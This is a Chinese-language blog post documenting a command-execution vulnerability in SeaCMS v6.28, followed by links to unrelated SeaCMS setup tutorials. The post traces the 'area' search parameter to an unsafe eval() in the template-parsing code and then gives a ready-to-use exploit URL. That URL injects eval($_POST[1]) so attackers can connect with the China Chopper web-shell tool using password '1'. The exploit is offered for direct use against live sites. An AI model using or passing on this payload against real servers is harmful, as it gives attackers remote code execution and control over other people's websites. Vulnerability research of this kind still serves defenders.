海洋cmsV6.28命令执行漏洞
0x00 代码审计
area参数处理过的地方经过字符是否非法判断之后,调用echoSearchPage()函数
area参数经过了检测是否是拼音之后
接下来到了
$content=$mainClassObj->parseSearchItemList($content,"area");因为能执行php代码一般就是eval()函数
搜索一下这个页面有eval函数的地方
for($m=0;$m<$arlen;$m++){ $strIf=$iar[1][$m]; $strIf=$this->parseStrIf($strIf);
$strThen=$iar[2][$m];
$strThen=$this->parseSubIf($strThen);
if (strpos($strThen,$labelRule2)===false){
if (strpos($strThen,$labelRule3)>=0){
$elsearray=explode($labelRule3,$strThen);
$strThen1=$elsearray[0];
$strElse1=$elsearray[1];
@eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");
if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}
}else{
@eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");
if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}
}可以在这里下个断点,把变量打印出来
就可以清晰的看到就是在这执行了我们的命令
0x01 EXP
/search.php?searchtype=5&tid=&area=eval($_POST@[1])直接菜刀链接 链接密码1
更多文章
-
海洋cms模板标签大全(收藏级)
海洋cms以其免费开源、采集功能强大著称,吸引了越来越影视站长。那么在使用海洋cms过程中,模板标签是必须要掌握的。下面是整理的海洋cms模板标签大全,对于做站朋友,一定有用,赶快收藏起来吧!海洋cms模板标签目录00.相关必要说明 01.全局标签 02.自定义标签 03.if标签和嵌套if标签subif(支持php语句、多e
-
海洋cms模板更换及安装教程
很多刚使用海洋cms站长朋友,不知道如何更换模板及安装,下面就详细的图文教程,快来学习! 第一步,从免费海洋cms模板下载网站(http://www.dongliancnc.com),选择喜好的模板并下载,特别说明都是人工测试过的模板,保证使用哦。 第二步,将模板压缩包,上传文件到网站templets目录下
-
海洋cms演员伪静态方法
海洋cms演员默认是动态URL,原URL格式: /search.php?searchword=汤唯修改后的URL格式: /zhuyan/汤唯伪静态修改步骤:1、复制根目录的search.php,并重命名为zhuyan.php,然后修改此文件的内容: $searchTemplatePath = &qu
-
海洋cms安装配置教程
在安装本系统前,请先确认您的服务器环境是否符合海洋cms环境要求: Windows 平台: IIS/Apache/Nginx + PHP(5.x) + MySQL(5.x) Linux/Unix 平台: Apache/Nginx + PHP (5.x) + MySQL(5.x) 安装步骤:以宝塔面板
-
海洋cms如何更换无广告视频解析
海洋CMS可以一键采集大视频网站的资源,并通过无广告视频解析器过滤掉视频上的广告。不过大部分资源都自带了大量的广告,如何通过更换解析过滤掉视频上的广告了?可以按照以下的方法进行操作。 海洋CMS更换解析方法/步骤:进入电影网站后台,点击【采集】-【资源库管理】,按照下图依次输入;(如果没有资源库管理